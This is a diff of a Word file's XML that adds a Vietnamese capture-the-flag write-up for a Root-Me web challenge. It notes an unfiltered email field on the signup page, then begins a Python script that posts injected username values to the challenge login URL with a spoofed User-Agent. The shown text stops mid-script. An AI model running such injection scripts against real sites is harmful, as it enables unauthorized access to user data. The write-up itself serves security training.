--- a/BT3456/5/58.docx
+++ b/BT3456/5/58.docx
@@ -3,8 +3,27 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>Đầu tiên vào trang thì ta thấy chương trình hiện tại không có gì bất thường</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
@@ -44,7 +63,7429 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>Ta sẽ thực hiện kiểm tra trang đăng ký thấy được phần mail chưa được filter</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8F71AF" wp14:editId="35191D6A">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="845261369" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="845261369" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>Ta sẽ code để tấn công</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>re</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>random</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t># Get a injected value</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>def</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'username'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'password'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'pw'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>request</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>post</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'http://challenge01.root-me.org/web-serveur/ch33/?action=login'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>headers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>={</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'User-Agent'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
